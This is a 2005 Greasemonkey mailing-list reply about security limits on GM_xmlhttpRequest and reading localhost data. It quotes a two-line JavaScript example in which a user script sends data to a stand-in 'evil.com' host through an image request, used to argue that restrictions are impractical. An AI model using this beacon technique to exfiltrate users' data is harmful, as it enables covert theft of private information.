[Greasemonkey] GM_xmlhttpRequest and localhost

Jason Diamond jason at injektilo.org
Tue Jul 19 16:33:54 EDT 2005

Aaron Boodman wrote:

>  I would like this too, and I really think that this is the feature.
>  However, locking down GM_xmlhttpRequest is meaningless. If somebody
>  wants to steal your data with a user script, all they have to do is:
>  var img = new Image();
 > img.src = "http://evil.com?yourdata=....";
>  There are numerous features like this in todays browsers and it isn't
>  practical to block them all. Even if you could, a user script could
>  simply change the href of every anchor attribute to his evil domain.
>  By the time you figured out what happened, he'd already have you.

Ah, good point.

>  Preventing the *reading* of internal data is a better argument for
>  pattern restrictions on GM_xmlhttpRequest since this is not
>  implementable in JavaScript except through xmlhttprequest.

It never occurred to me that I could read local data with a user script 
until I saw Mark's exploit. Now that I know it's possible, I'd hate to 
see that capability disappear (assuming, of course, the security 
problems can be "solved").


More information about the Greasemonkey mailing list